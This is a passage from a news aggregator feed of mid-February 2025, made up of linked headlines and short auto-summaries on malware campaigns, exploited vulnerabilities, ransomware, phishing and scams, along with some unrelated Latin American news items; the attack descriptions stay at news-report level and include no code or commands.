    Autosummary: "The attacker accomplishes two impressive goals with this malicious script: avoiding easy detection by security scanners by encoding the malicious script within an <img> tag, and ensuring end users don"t notice unusual changes when the malicious form is inserted, staying undetected as long as possible," Martin said. "


    Bus crash in Bolivia kills at least 30 people

    latam
    2025-02-18 https://www.bbc.com/news/articles/cd7d7llvz28o
    The driver likely lost control of the vehicle, causing it to plunge almost 800 meters. "

    Autosummary: "


    New XCSSET macOS malware variant used in limited attacks

    exploits
    2025-02-18 https://securityaffairs.com/174333/malware/apple-macos-malware-xcsset-limited-attacks.html
    Microsoft discovered a new variant of the Apple macOS malware XCSSET that was employed in limited attacks in the wild. Microsoft Threat Intelligence discovered a new variant of the macOS malware XCSSET in attacks in the wild. XCSSET is a sophisticated modular macOS malware that targets users by infecting Xcode projects, it has been active since at […] "

    Autosummary: The new variant of the malware uses two methods for persistence: the “zshrc” method, where it creates a file to launch on new shell sessions, and the “dock” method, where it downloads a tool to replace a legitimate Launchpad app with a fake one, executing both the app and malware. "


    Lee Enterprises newspaper disruptions caused by ransomware attack

    exploits ransomware
    2025-02-18 https://www.bleepingcomputer.com/news/security/lee-enterprises-newspaper-disruptions-caused-by-ransomware-attack/
    Newspaper publishing giant Lee Enterprises has confirmed that a ransomware attack is behind ongoing disruptions impacting the group's operations for over two weeks. [...] "

    Autosummary: "The incident impacted the Company's operations, including distribution of products, billing, collections, and vendor payments. "


    Got a Microsoft Teams invite? Storm-2372 gang exploit device codes in global phishing attacks

    financial exploits
    2025-02-18 https://www.tripwire.com/state-of-security/microsoft-teams-storm-2372-exploit-device-codes
    Security experts have warned that a cybercriminal group has been running a malicious and inventive phishing campaign since August 2024 to break into organizations across Europe, North America, Africa, and the Middle East. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: The Russian group, known as Storm-2372, has targeted government and non-governmental organisations (NGOs), as well as firms working in IT, defence, telecoms, health, and the energy sector. "


    New FrigidStealer Malware Targets macOS Users via Fake Browser Updates

    exploits
    2025-02-18 https://thehackernews.com/2025/02/new-frigidstealer-malware-targets-macos.html
    Cybersecurity researchers are alerting to a new campaign that leverages web injects to deliver a new Apple macOS malware known as FrigidStealer. The activity has been attributed to a previously undocumented threat actor known as TA2727, with the information stealers for other platforms such as Windows (Lumma Stealer or DeerStealer) and Android (Marcher). TA2727 is a "threat actor that uses fake "

    Autosummary: TA2726, per the enterprise security firm, acts as a TDS for TA2727 and another threat actor called TA569, which is responsible for the distribution of a JavaScript-based loader malware referred to as SocGholish (aka FakeUpdates) that often masquerades as a browser update on legitimate-but-compromised sites. "


    Juniper Session Smart Routers Vulnerability Could Let Attackers Bypass Authentication

    exploits
    2025-02-18 https://thehackernews.com/2025/02/juniper-session-smart-routers.html
    Juniper Networks has released security updates to address a critical security flaw impacting Session Smart Router, Session Smart Conductor, and WAN Assurance Router products that could be exploited to hijack control of susceptible devices. Tracked as CVE-2025-21589, the vulnerability carries a CVSS v3.1 score of 9.8 and a CVSS v4 score of 9.3. "An Authentication Bypass Using an Alternate Path or "

    Autosummary: "


    Debunking the AI Hype: Inside Real Hacker Tactics

    industry
    2025-02-18 https://thehackernews.com/2025/02/debunking-ai-hype-inside-real-hacker.html
    Is AI really reshaping the cyber threat landscape, or is the constant drumbeat of hype drowning out actual, more tangible, real-world dangers? According to Picus Labs' Red Report 2025 which analyzed over one million malware samples, there's been no significant surge, so far, in AI-driven attacks. Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a "

    Autosummary: Yes, adversaries are definitely continuing to innovate, and while AI will certainly start playing a larger and larger role, the latest data suggests that a set of well-known tactics, techniques, and procedures (TTPs) are still dominating the field. With legitimate processes cloaking malicious operations and actual day-to-day network traffic hiding nefarious data uploads, bad actors can exfiltrate data right under your security team's proverbial nose, no Hollywood-style "smash-and-grab" needed. "


    Argentina's President Milei denies crypto fraud allegations

    latam
    2025-02-18 https://www.bbc.com/news/articles/c1w07nq8qqqo
    Javier Milei says he was acting in "good faith" when he posted about a crypto currency which collapsed. "

    Autosummary: On Monday, Milei said he had acted "in good faith" and dismissed investors' complaints, comparing their actions to people who gamble: "If you go to a casino and lose money, what's there to complain about when you knew the risks?" A judge will now determine if the president should face fraud charges over the incident. "


    Compliance Isn’t Security: Why a Checklist Won’t Stop Cyberattacks

    ciber
    2025-02-18 https://www.bleepingcomputer.com/news/security/compliance-isnt-security-why-a-checklist-wont-stop-cyberattacks/
    Think you're safe because you're compliant? Think again. Recent studies continue to highlight the concerning trend that compliance with major security frameworks does not necessarily prevent data breaches. Learn more from Pentera on how automated security validation bridges the security gaps. [...] "

    Autosummary: The Disconnect Between Compliance and Security. Compliance frameworks like PCI-DSS, SEC, and DORA are designed to protect sensitive data and reduce risk, providing clear guidance on managing confidentiality, integrity, and availability. Organizations must go beyond regulatory requirements by incorporating proactive security measures, such as: validating defenses regularly to ensure effectiveness; identifying gaps in vendor security and third-party integrations; eliminating security weaknesses caused by misconfigurations, poor access controls, and outdated policies. "


    6 considerations for 2025 cybersecurity investment decisions

    ciber
    2025-02-18 https://www.helpnetsecurity.com/2025/02/18/2025-cybersecurity-investments-decisions/

    Cybersecurity professionals may be concerned about the constantly shifting threat landscape. From the increased use of artificial intelligence (AI) by malicious actors to the expanding attack surface, cybersecurity risks evolve, and defenders need to mitigate them. Despite a period of cybersecurity budget growth between 2021 and 2022, this growth has slowed in the last few years, meaning that cybersecurity leaders need to carefully consider how their purchases improve their current security and compliance posture. To … More

    The post 6 considerations for 2025 cybersecurity investment decisions appeared first on Help Net Security.

    "

    Autosummary: As organizations choose their cybersecurity investments for 2025, they should consider how to implement identity hygiene, processes for implementing, maintaining, and monitoring user access across complex environments, including those consisting of interconnected applications and large numbers of difficult-to-manage users, like service accounts. Some examples of ways that these service accounts can create risks include: developers building in-house systems who create a security workaround; third-party vendors' systems; legacy devices, accounts, and entitlements whose password policies haven't been updated. Identifying and managing service accounts will be a key security risk mitigation strategy. Reducing friction for users improves security adoption. Organizations need to deploy more security products, create deeper security policies, and monitor their environment with more rigor, but each time they add a new control they create additional friction for the end users. "


    BlackLock ransomware onslaught: What to expect and how to fight it

    exploits ransomware
    2025-02-18 https://www.helpnetsecurity.com/2025/02/18/blacklock-ransomware-what-to-expect-how-to-fight-it/

    BlackLock is on track to become the most active ransomware-as-a-service (RaaS) outfit in 2025, according to ReliaQuest. Its success is primarily due to their unusually active presence and good reputation on the ransomware-focused Russian-language forum RAMP, and their aggressive recruiting of traffers (individuals that steer victims to harmful content/software), initial access brokers (IABs), and affiliates. What is BlackLock? BlackLock (aka El Dorado or Eldorado) cropped up in early 2024. It uses custom-built ransomware that can … More

    The post BlackLock ransomware onslaught: What to expect and how to fight it appeared first on Help Net Security.

    "

    Autosummary: BlackLock’s representative on RAMP forum, who goes by “$$$”, is highly active: they are making connections and building trust, engaging in chats in various forum sections, and are often reaching out to developers, initial access brokers, potential affiliates, and rival gangs. "


    Cybercriminals shift focus to social media as attacks reach historic highs

    ciber
    2025-02-18 https://www.helpnetsecurity.com/2025/02/18/cybercriminals-social-media-attacks/

    A new report from Gen highlights a sharp rise in online threats, capping off a record-breaking 2024. Between October and December alone, 2.55 billion cyber threats were blocked – an astonishing rate of 321 per second. The risk of encountering a threat climbed to 27.7% in Q4, with social engineering attacks accounting for 86% of all blocked threats. This underscores the increasingly sophisticated psychological tactics cybercriminals are using to deceive victims. “We’re continuing to see … More

    The post Cybercriminals shift focus to social media as attacks reach historic highs appeared first on Help Net Security.

    "

    Autosummary: “We’re continuing to see scam-related threats becoming far more dangerous as they hide, sometimes in plain sight, throughout every aspect of our digital life,” said Siggi Stefnisson, Cyber Safety CTO at Gen. “This quarter we saw them prey on people’s emotions, such as the need to shop on budget during the holidays, the desire to find love during the end of the year, the hope for change during government elections and more.” The dark side of social media: Phishing attacks surged by 14% in Q4 2024, with cybercriminals exploiting website-building platforms like Wix to create convincing fake sites and spoofing brands like Apple iCloud through fraudulent invoice scams. "


    Unit21 empowers financial institutions to detect and stop scams

    financial
    2025-02-18 https://www.helpnetsecurity.com/2025/02/18/unit21-scams-solution/

    Unit21 launched its new scams solution that helps financial institutions and fintechs detect and stop scams before they cause financial harm. Using AI automation, the new solution can be integrated into a fraud team’s workflow to accelerate investigations and response times while also incorporating IP insights and consortium signals to prevent and detect scams before they hit consumer financial accounts. Advancements in technology have allowed criminals to scam consumers and businesses at unprecedented speed and … More

    The post Unit21 empowers financial institutions to detect and stop scams appeared first on Help Net Security.

    "

    Autosummary: Shut down fraudulent logins in real-time : IP data enrichment flags VPNs, proxies, Tor, and bots to prevent fraudulent access. "


    Chinese Hackers Exploit MAVInject.exe to Evade Detection in Targeted Cyber Attacks

    exploits
    2025-02-18 https://thehackernews.com/2025/02/chinese-hackers-exploit-mavinjectexe-to.html
    The Chinese state-sponsored threat actor known as Mustang Panda has been observed employing a novel technique to evade detection and maintain control over infected systems. This involves the use of a legitimate Microsoft Windows utility called Microsoft Application Virtualization Injector (MAVInject.exe) to inject the threat actor's malicious payload into an external process, waitfor.exe, "

    Autosummary: "


    Venture capital giant Insight Partners hit by cyberattack

    ciber
    2025-02-18 https://www.bleepingcomputer.com/news/security/venture-capital-giant-insight-partners-hit-by-cyberattack/
    New York-based venture capital and private equity firm Insight Partners has disclosed that its systems were breached in January following a social engineering attack. [...] "

    Autosummary: "


    No, you’re not fired – but beware of job termination scams

    financial
    2025-02-18 https://www.welivesecurity.com/en/scams/no-youre-not-fired-beware-job-termination-scams/
    Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff "

    Autosummary: And also consider the following: use strong, unique passwords for every account, ideally stored in a password manager; be sure to switch on two-factor authentication (2FA) for an extra layer of access security; make sure all of your work and personal devices are regularly patched and up to date; if your IT department offers, join regular phishing simulation exercises to understand what to look out for; if you receive a suspect message, never click on embedded links or open the attachment; contact the sender through other channels if you’re concerned – but not by replying to the email or using the contact details listed on it; report any suspect emails to your employer’s IT department; check whether colleagues have received the same message. Employment termination scams have been around for some time. It may be something completely different, or it could be an attempt to mimic the impersonated company’s domain, using typos and other characters (e.g., m1crosoft.com, @microsfot.com). A generic greeting (e.g., “dear employee/user”), which is certainly not the tone a legitimate termination letter would take. At their simplest, job termination scams are a type of phishing attack designed to trick you into handing over your personal and financial information, or on clicking on a malicious link which could trigger a malware download. "


    ⚡ THN Weekly Recap: Google Secrets Stolen, Windows Hack, New Crypto Scams and More

    financial
    2025-02-17 https://thehackernews.com/2025/02/thn-weekly-recap-google-secrets-stolen.html
    Welcome to this week’s Cybersecurity News Recap. Discover how cyber attackers are using clever tricks like fake codes and sneaky emails to gain access to sensitive data. We cover everything from device code phishing to cloud exploits, breaking down the technical details into simple, easy-to-follow insights. ⚡ Threat of the Week Russian Threat Actors Leverage Device Code Phishing to Hack "

    Autosummary: This week's list includes — CVE-2025-1094 (PostgreSQL), CVE-2025-0108 (Palo Alto Networks PAN-OS), CVE-2025-23359 (NVIDIA Container Toolkit), CVE-2025-21391 (Microsoft Windows Storage), CVE-2025-21418 (Microsoft Windows Ancillary Function Driver for WinSock), CVE-2024-38657, CVE-2025-22467, CVE-2024-10644 (Ivanti Connect Secure), CVE-2024-47908 (Ivanti Cloud Services Application), CVE-2024-56131, CVE-2024-56132, CVE-2024-56133, CVE-2024-56134, CVE-2024-56135 (Progress Kemp LoadMaster), CVE-2025-24200 (Apple iOS and iPadOS), CVE-2024-12797 (OpenSSL), CVE-2025-21298 (Microsoft Windows OLE), CVE-2025-1240 (WinZip), CVE-2024-32838 (Apache Fineract), CVE-2024-52577 (Apache Ignite), CVE-2025-26793 (Hirsch Enterphone MESH), CVE-2024-12562 (s2Member Pro plugin), CVE-2024-13513 (Oliver POS – A WooCommerce Point of Sale (POS) plugin), CVE-2025-26506 (HP LaserJet), CVE-2025-22896, CVE-2025-25067, CVE-2025-24865 (mySCADA myPRO Manager), CVE-2024-13182 (WP Directorybox Manager plugin), CVE-2024-10763 (Campress theme), CVE-2024-7102 (GitLab CE/EE), CVE-2024-12213 (WP Job Board Pro plugin), CVE-2024-13365 (Security & Malware scan by CleanTalk plugin), CVE-2024-13421 (Real Estate 7 theme), and CVE-2025-1126 (Lexmark Print Management Client). 
    Critical ThinkPHP and OwnCloud Flaws Under Active Exploitation — Threat actors are attempting to actively exploit two known security vulnerabilities impacting ThinkPHP (CVE-2022-47945, CVSS score: 9.8) and OwnCloud (CVE-2023-49103, CVSS score: 10.0) over the past few days, with attacks originating from hundreds of unique IP addresses, most of which are based in Germany, China, the U.S., Singapore, Hong Kong, the Netherlands, the U.K., and Canada. Datadog, which detailed the attack, said roughly 1% of organizations monitored by the company were affected by the whoAMI, and that it found public examples of code written in Python, Go, Java, Terraform, Pulumi, and Bash shell using the vulnerable criteria. The individual, one of the officials of the SSU Counterterrorism Center, is alleged to have been recruited by Russia's Federal Security Service (FSB) in Vienna in 2018, and actively began engaging in espionage at the end of December last year, transmitting documents containing state secrets, to the intelligence agency via a "special mobile phone." "These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution," the agencies said, labeling them as unforgivable defects. RansomHub Targets Over 600 Orgs Globally — The RansomHub ransomware operation has targeted over 600 organizations across the world, spanning sectors such as healthcare, finance, government, and critical infrastructure, making it one of the most active cybercrime groups in 2024. Separately, the Justice Department has also charged Canadian national Andean Medjedovic, 22, for exploiting smart contract vulnerabilities in two decentralized finance crypto platforms, KyberSwap and Indexed Finance, to fraudulently obtain about $65 million from the protocols' investors between 2021 and 2023. Foreign Adversaries Target Local Communities in the U.S. for Influence Ops — A new report from the Alliance for Securing Democracy (ASD) has found that foreign nation-state actors from Russia, China, and Iran are running influence operations that exploit trust in local sources and impact state and local communities in the U.S. with an aim to manipulate public opinion, stoke discord, and undermine democratic institutions. "


    A PostgreSQL zero-day was also exploited in US Treasury hack (CVE-2025-1094)

    exploits
    2025-02-17 https://www.helpnetsecurity.com/2025/02/17/a-postgresql-zero-day-was-also-exploited-in-us-treasury-hack-cve-2025-1094/

    The suspected Chinese state-sponsored hackers who breached workstations of several US Treasury employees in December 2024 did so by leveraging not one, but two zero-days, according to Rapid7 researchers. It was initially reported that the attackers compromised the Treasury’s BeyondTrust Remote Support SaaS instances via CVE-2024-12356, a previously unknown unauthenticated command injection vulnerability. But, as Rapid7 researchers discovered (and confirmed by testing), “a successful exploit for CVE-2024-12356 had to include exploitation of CVE-2025-1094 in order … More

    The post A PostgreSQL zero-day was also exploited in US Treasury hack (CVE-2025-1094) appeared first on Help Net Security.

    "

    Autosummary: “An attacker who can generate a SQL injection via CVE-2025-1094 can then achieve arbitrary code execution (ACE) by leveraging the interactive tool’s ability to run meta-commands,” Stephen Fewer, Principal Security Researcher at Rapid7, explained. "


    Microsoft spots XCSSET macOS malware variant used for crypto theft

    exploits
    2025-02-17 https://www.bleepingcomputer.com/news/security/microsoft-spots-xcsset-macos-malware-variant-used-for-crypto-theft/
    A new variant of the XCSSET macOS modular malware has emerged in attacks that target users' sensitive information, including digital wallets and data from the legitimate Notes app. [...] "

    Autosummary: Module names in the code are also obfuscated, which makes analyzing their intent more difficult. Two persistence techniques (zshrc and dock). New Xcode infection methods: the malware uses the TARGET, RULE, or FORCED_STRATEGY options to place the payload in the Xcode project. "


    The XCSSET info-stealing malware is back, targeting macOS users and devs

    exploits
    2025-02-17 https://www.helpnetsecurity.com/2025/02/17/the-xcsset-info-stealing-malware-is-back-targeting-macos-users-and-devs/

    A new, improved variant of the XCSSET macOS malware has been spotted “in limited attacks” by Microsoft’s threat researchers. XCSSET macOS malware: XCSSET is information-stealing and backdoor-injecting malware targeting Mac users. It’s usually distributed via infected Xcode projects – a collection of files, settings, and configurations that make up an app or framework developed using Xcode, Apple’s official integrated development environment (IDE) for macOS. The threat has been around for years. Past variants even used … More

    The post The XCSSET info-stealing malware is back, targeting macOS users and devs appeared first on Help Net Security.

    "

    Autosummary: The malware also uses new persistence mechanisms: it creates a file named ~/.zshrc_aliases, which contains the payload, and appends a command to it that will launch it every time a new shell session is initiated; it downloads a signed dockutil tool from a command-and-control server to manage the dock items, creates a fake Launchpad application, and replaces the legitimate Launchpad’s path entry in the dock with the fake one. "


    Microsoft Uncovers New XCSSET macOS Malware Variant with Advanced Obfuscation Tactics

    exploits industry
    2025-02-17 https://thehackernews.com/2025/02/microsoft-uncovers-new-xcsset-macos.html
    Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild. "Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies," the Microsoft Threat Intelligence team said in a post shared on X. "These enhanced features add to "

    Autosummary: "


    Argentina president faces impeachment calls over crypto crash

    latam
    2025-02-17 https://www.bbc.com/news/articles/cp9x9j89evxo
    Some have accused Javier Milei of performing a "rug pull" after he promoted a virtual coin on social media. "

    Autosummary: Former President Cristina Fernández de Kirchner, who is now in opposition, was heavily critical, calling him a "crypto scammer" in a post seen 6.4 million times. "


    Fintech giant Finastra notifies victims of October data breach

    financial
    2025-02-17 https://www.bleepingcomputer.com/news/security/fintech-giant-finastra-notifies-victims-of-october-data-breach/
    Financial technology giant Finastra is notifying victims of a data breach after their personal information was stolen by unknown attackers who first breached its systems in October 2024. [...] "

    Autosummary: While Finastra has yet to share the number of individuals affected by the data breach and the nature of the exposed data (besides victims' names), the company started sending breach notification letters last week to at least 65 people in the state whose financial account information was stolen (according to filings with the Attorney General's office in Massachusetts). "


    Week in review: Microsoft fixes two actively exploited 0-days, PAN-OS auth bypass hole plugged

    exploits
    2025-02-16 https://www.helpnetsecurity.com/2025/02/16/week-in-review-microsoft-fixes-two-actively-exploited-0-days-pan-os-auth-bypass-hole-plugged/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes two actively exploited zero-days (CVE-2025-21418, CVE-2025-21391) February 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 56 vulnerabilities, including two zero-days – CVE-2025-21418 and CVE-2025-21391 – under active exploitation. PAN-OS authentication bypass hole plugged, PoC is public (CVE-2025-0108) Palo Alto Networks has fixed a high-severity authentication bypass vulnerability (CVE-2025-0108) in the management web interface of its … More

    The post Week in review: Microsoft fixes two actively exploited 0-days, PAN-OS auth bypass hole plugged appeared first on Help Net Security.

    "

    Autosummary: New infosec products of the week: February 14, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Armor, EchoMark, Netwrix, Palo Alto Networks, and Socure. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 33

    exploits
    2025-02-16 https://securityaffairs.com/174262/malware/security-affairs-malware-newsletter-round-33.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Mobile Indian Cyber Heist: FatBoyPanel And His Massive Data Breach; Google Tag Manager Skimmer Steals Credit Card Info From Magento Site; From South America to Southeast Asia: The Fragile Web of REF7707; Analyzing DEEP#DRIVE: North Korean […] "

    Autosummary: "


    Storm-2372 used the device code phishing technique since August 2024

    financial
    2025-02-16 https://securityaffairs.com/174270/apt/storm-2372-used-device-code-phishing-technique.html
    Russia-linked group Storm-2372 used the device code phishing technique since Aug 2024 to steal login tokens from governments, NGOs, and industries. Microsoft Threat Intelligence researchers warn that threat actor Storm-2372, likely linked to Russia, has been targeting governments, NGOs, and various industries across multiple regions since August 2024. The attackers employ a phishing technique called […] "

    Autosummary: Storm-2372’s targets during this time have included government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East. "


    New FinalDraft malware abuses Outlook mail service for stealthy comms

    exploits
    2025-02-16 https://www.bleepingcomputer.com/news/security/new-finaldraft-malware-abuses-outlook-mail-service-for-stealthy-comms/
    A new malware called FinalDraft has been using Outlook email drafts for command-and-control communication in attacks against a ministry in a South American country. [...] "

    Autosummary: File operations (copying, deleting, or overwriting files); PowerShell execution (without launching powershell.exe). Elastic Security Labs also observed a Linux variant of FinalDraft, which can still use Outlook via REST API and Graph API, as well as HTTP/HTTPS, reverse UDP & ICMP, bind/reverse TCP, and DNS-based C2 exchange. "


    Brazilian teenager wins first ATP Tour title

    latam
    2025-02-16 https://www.bbc.com/sport/tennis/articles/cx2j2y1vrrko
    Teenager Joao Fonseca underlines why he is one of tennis' most promising stars by beating Francisco Cerundolo to claim his first ATP Tour title. "

    Autosummary: "


    Critics say new Google rules put profits over privacy

    industry
    2025-02-16 https://www.bbc.com/news/articles/cm21g0052dno
    Google is allowing advertisers to collect more personal information, which is harder for users to control. "

    Autosummary: "By allowing fingerprinting, Google has given itself - and the advertising industry it dominates - permission to use a form of tracking that people can't do much to stop," said Martin Thomson, distinguished engineer at Mozilla, a rival to Google. "


    Microsoft: Hackers steal emails in device code phishing attacks

    financial
    2025-02-15 https://www.bleepingcomputer.com/news/security/microsoft-hackers-steal-emails-in-device-code-phishing-attacks/
    An active campaign from a threat actor potentially linked to Russia is targeting Microsoft 365 accounts of individuals at organizations of interest using device code phishing. [...] "

    Autosummary: The targets are in the government, NGO, IT services and technology, defense, telecommunications, health, and energy/oil and gas sectors in Europe, North America, Africa, and the Middle East. "


    U.S. CISA adds Apple iOS and iPadOS and Mitel SIP Phones flaws to its Known Exploited Vulnerabilities catalog

    exploits
    2025-02-15 https://securityaffairs.com/174246/security/u-s-cisa-adds-apple-ios-and-ipados-and-mitel-sip-phones-flaws-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple iOS and iPadOS and Mitel SIP Phones vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple iOS and iPadOS and Mitel SIP Phones vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The two vulnerabilities are: This week Apple released […] "

    Autosummary: The zero-day impacts the following devices: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. The two vulnerabilities are: CVE-2025-24200 Apple iOS and iPadOS Incorrect Authorization Vulnerability; CVE-2024-41710 Mitel SIP Phones Argument Injection Vulnerability. This week Apple released emergency security updates to address a zero-day vulnerability, tracked as CVE-2025-24200, that the company believes was exploited in “extremely sophisticated” targeted attacks. "


    Attackers exploit recently disclosed Palo Alto Networks PAN-OS firewalls bug

    exploits
    2025-02-15 https://securityaffairs.com/174237/hacking/exploitation-palo-alto-networks-pan-os-firewalls-bug.html
    Threat actors are exploiting a recently disclosed vulnerability, tracked as CVE-2025-0108, in Palo Alto Networks PAN-OS firewalls. Researchers warn that threat actors are exploiting a recently disclosed vulnerability, tracked as CVE-2025-0108, in Palo Alto Networks PAN-OS firewalls. The Shadowserver Foundation researchers observed several CVE-2025-0108 attempts since 4 am UTC 2024-02-13 in their honeypots. The experts said […] "

    Autosummary: Attackers exploit recently disclosed Palo Alto Networks PAN-OS firewalls bug (Pierluigi Paganini, February 15, 2025). Threat actors are exploiting a recently disclosed vulnerability, tracked as CVE-2025-0108, in Palo Alto Networks PAN-OS firewalls. "


    Pig butchering scams are exploding

    financial
    2025-02-14 https://www.helpnetsecurity.com/2025/02/14/pig-butchering-scams-fraud-growth/

    2024 is set to be a record year for scammers, who received at least US$9.9 billion in crypto revenues from their illicit activities, according to Chainalysis. This figure is projected to rise to an all-time high of $12.4 billion as ongoing analysis uncovers more fraudulent activity. These findings are part of Chainalysis’ research into scams, highlighting high-yield investment scams (50%) and pig butchering (33%) as the two most prevalent types of fraud and scam. Pig butchering scams … More

    The post Pig butchering scams are exploding appeared first on Help Net Security.

    "

    Autosummary: Pig butchering scams surge in 2024. Interestingly, despite pulling in half of all scam revenue in 2024, high-yield investment scam inflows declined by 36% YoY. On the other hand, pig butchering revenue increased by almost 40% YoY, and the number of deposits to pig butchering scams grew nearly 210% YoY, potentially indicating an expansion of the victim pool. "


    PostgreSQL Vulnerability Exploited Alongside BeyondTrust Zero-Day in Targeted Attacks

    exploits
    2025-02-14 https://thehackernews.com/2025/02/postgresql-vulnerability-exploited.html
    Threat actors who were behind the exploitation of a zero-day vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products in December 2024 likely also exploited a previously unknown SQL injection flaw in PostgreSQL, according to findings from Rapid7. The vulnerability, tracked as CVE-2025-1094 (CVSS score: 8.1), affects the PostgreSQL interactive tool psql. "An "

    Autosummary: "


    US charges two Russian men in connection with Phobos ransomware operation

    exploits ransomware rusia-ucrania
    2025-02-14 https://www.bitdefender.com/en-us/blog/hotforsecurity/us-charges-russian-men-phobos-ransomware-operation
    Roman Berezhnoy and Egor Nikolaevich Glebov are alleged to have extorted over US $16 million in ransom payments using the Phobos ransomware, impacting over 1000 organisations in the United States. Read more in my article on the Hot for Security blog. "

    Autosummary: "


    Valve removed the game PirateFi from the Steam video game platform because it contained malware

    exploits
    2025-02-14 https://securityaffairs.com/174205/malware/valve-removed-a-game-from-steam.html
    Valve removed a game from Steam because it contained malware; the company also warned affected users to reformat their operating systems. Valve removed the game PirateFi from the Steam video game platform because it contained Windows malicious code that steals browser cookies and hijacks accounts. The company also warned affected users to fully reformat […] "

    Autosummary: Valve removed the game PirateFi from the Steam video game platform because it contained malware (Pierluigi Paganini, February 14, 2025). Valve removed a game from Steam because it contained malware; the company also warned affected users to reformat their operating systems. "


    PostgreSQL flaw exploited as zero-day in BeyondTrust breach

    exploits
    2025-02-14 https://www.bleepingcomputer.com/news/security/postgresql-flaw-exploited-as-zero-day-in-beyondtrust-breach/
    Rapid7's vulnerability research team says attackers exploited a PostgreSQL security flaw as a zero-day to breach the network of privileged access management company BeyondTrust in December. [...] "

    Autosummary: "Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns," the PostgreSQL security team explains. "


    Chinese hackers breach more US telecoms via unpatched Cisco routers

    Telcos
    2025-02-14 https://www.bleepingcomputer.com/news/security/chinese-hackers-breach-more-us-telecoms-via-unpatched-cisco-routers/
    China's Salt Typhoon hackers are still actively targeting telecoms worldwide and have breached more U.S. telecommunications providers via unpatched Cisco IOS XE network devices. [...] "

    Autosummary: "


    Microsoft fixes bug causing Windows Server 2025 boot errors

    exploits
    2025-02-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-causing-windows-server-2025-boot-errors/
    Microsoft has fixed a known issue causing "boot device inaccessible" errors during startup on some Windows Server 2025 systems using iSCSI. [...] "

    Autosummary: "


    Microsoft: Russian-Linked Hackers Using "Device Code Phishing" to Hijack Accounts

    financial rusia-ucrania
    2025-02-14 https://thehackernews.com/2025/02/microsoft-russian-linked-hackers-using.html
    Microsoft is calling attention to an emerging threat cluster it calls Storm-2372 that has been attributed to a new set of cyber attacks aimed at a variety of sectors since August 2024. The attacks have targeted government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas "

    Autosummary: "


    RansomHub Becomes 2024’s Top Ransomware Group, Hitting 600+ Organizations Globally

    exploits ransomware
    2025-02-14 https://thehackernews.com/2025/02/ransomhub-becomes-2024s-top-ransomware.html
    The threat actors behind the RansomHub ransomware-as-a-service (RaaS) scheme have been observed leveraging now-patched security flaws in Microsoft Active Directory and the Netlogon protocol to escalate privileges and gain unauthorized access to a victim network's domain controller as part of their post-compromise strategy. "RansomHub has targeted over 600 organizations globally, spanning sectors "

    Autosummary: "After gaining access into the environment and performing reconnaissance, these tunneling tools are strategically deployed on critical network devices, including ESXi hosts, Windows hosts, VPN appliances, and network attached storage (NAS) devices," Sygnia researchers said. "RansomHub has targeted over 600 organizations globally, spanning sectors such as healthcare, finance, government, and critical infrastructure, firmly establishing it as the most active ransomware group in 2024," Group-IB analysts said in an exhaustive report published this week. "


    SonicWall firewall bug leveraged in attacks after PoC exploit release

    exploits
    2025-02-14 https://www.bleepingcomputer.com/news/security/sonicwall-firewall-bug-leveraged-in-attacks-after-poc-exploit-release/
    Attackers are now targeting an authentication bypass vulnerability affecting SonicWall firewalls shortly after the release of proof-of-concept (PoC) exploit code. [...] "

    Autosummary: This security flaw (CVE-2024-53704), tagged by CISA as critical severity and found in the SSLVPN authentication mechanism, impacts SonicOS versions 7.1.x (up to 7.1.1-7058), 7.1.2-7019, and 8.0.0-8035, used by multiple models of Gen 6 and Gen 7 firewalls and SOHO series devices. "


    Malicious PirateFi game infects Steam users with Vidar malware

    exploits
    2025-02-14 https://www.bleepingcomputer.com/news/security/malicious-piratefi-game-infects-steam-users-with-vidar-malware/
    A free-to-play game named PirateFi in the Steam store has been distributing the Vidar infostealing malware to unsuspecting users. [...] "

    Autosummary: "If you are one of the players who downloaded this "game": Consider the credentials, session cookies and secrets saved in your browser, email client, cryptocurrency wallets etc. compromised," advises SECUINFRA. "


    12 Million Zacks accounts leaked by cybercriminal

    ciber
    2025-02-14 https://www.malwarebytes.com/blog/news/2025/02/12-million-zacks-accounts-leaked-by-cybercriminal
    A cybercriminal claims to have stolen 15 million data records on Zacks’ customers and clients. "

    Autosummary: If you have high reputation and want the source code send a PM. Breached by @Jurak and @StableFish. Below is a sample of the customers database: CLUE, HINT, PASSWORD, USERNAME, LAST_NAME, FIRST_NAME, CUSTOMER_ID, DATE_REGISTERED, DATE_UPDATED, DISPLAY_NAME, FIRM_NAME, TIMEZONE_CODE, LAST_PASSWORD_CHANGE” BleepingComputer says it has reached out to Zacks on several occasions but didn’t get a response. The data contains names, email addresses, usernames, passwords, phone numbers, addresses, company names, and additional personal information. In October 2024, we found data reported to belong to Zacks containing 8,441 records which includes email addresses, physical addresses, phone numbers, and full names, and potentially other compromised user details. "


    Hackers exploit authentication bypass in Palo Alto Networks PAN-OS

